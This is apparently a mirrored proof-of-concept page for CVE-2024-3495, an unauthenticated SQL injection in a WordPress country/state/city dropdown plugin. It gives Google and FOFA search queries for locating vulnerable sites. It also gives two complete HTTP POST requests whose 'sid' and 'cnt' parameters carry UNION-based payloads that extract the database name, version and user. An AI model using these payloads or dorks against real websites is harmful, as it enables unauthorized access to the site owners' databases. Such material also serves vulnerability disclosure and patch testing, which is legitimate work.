Share
## https://sploitus.com/exploit?id=EDF4B3F8-DDF4-5196-A375-EC81B8BC18F1
# CVE-2024-3495-Poc
CVE-2024-3495 Country State City Dropdown CF7 <= 2.7.2 - Unauthenticated SQL Injection

Description

The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the โ€˜cntโ€™ and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/country-state-city-auto-dropdown/country-state-city-dropdown-cf7-272-unauthenticated-sql-injection

```inurl:"/wp-content/plugins/country-state-city-auto-dropdown/"```

```
https://x.com/fofabot/status/1793477848428364155
FOFA Query: body="/wp-content/plugins/country-state-city-auto-dropdown/"
https://en.fofa.info/result?qbase64=Ym9keT0iL3dwLWNvbnRlbnQvcGx1Z2lucy9jb3VudHJ5LXN0YXRlLWNpdHktYXV0by1kcm9wZG93bi8i
```

File: includes\ajax-actions.php
![image](https://github.com/truonghuuphuc/CVE-2024-3495-Poc/assets/20487674/e29eb5d1-c90d-4f79-8409-cccd213ac18c)

Found nonce
![image](https://github.com/truonghuuphuc/CVE-2024-3495-Poc/assets/20487674/c605bb8f-65f7-4425-84d7-ac9285568be7)


Poc:

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <Host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 172

action=tc_csca_get_cities&nonce_ajax={{nonce}}&sid=1+or+0+union+select+concat(0x64617461626173653a,database(),0x7c76657273696f6e3a,version(),0x7c757365723a,user()),2,3--+-
```

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <Host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 172

action=tc_csca_get_states&nonce_ajax={{nonce}}&cnt=1+or+0+union+select+concat(0x64617461626173653a,database(),0x7c76657273696f6e3a,version(),0x7c757365723a,user()),2,3--+-
```

![image](https://github.com/truonghuuphuc/CVE-2024-3495-Poc/assets/20487674/350142b4-e5d2-43a2-a266-9cc5fd846f7c)

![image](https://github.com/truonghuuphuc/CVE-2024-3495-Poc/assets/20487674/8e8053b3-2185-4a6e-983b-84afbab385b4)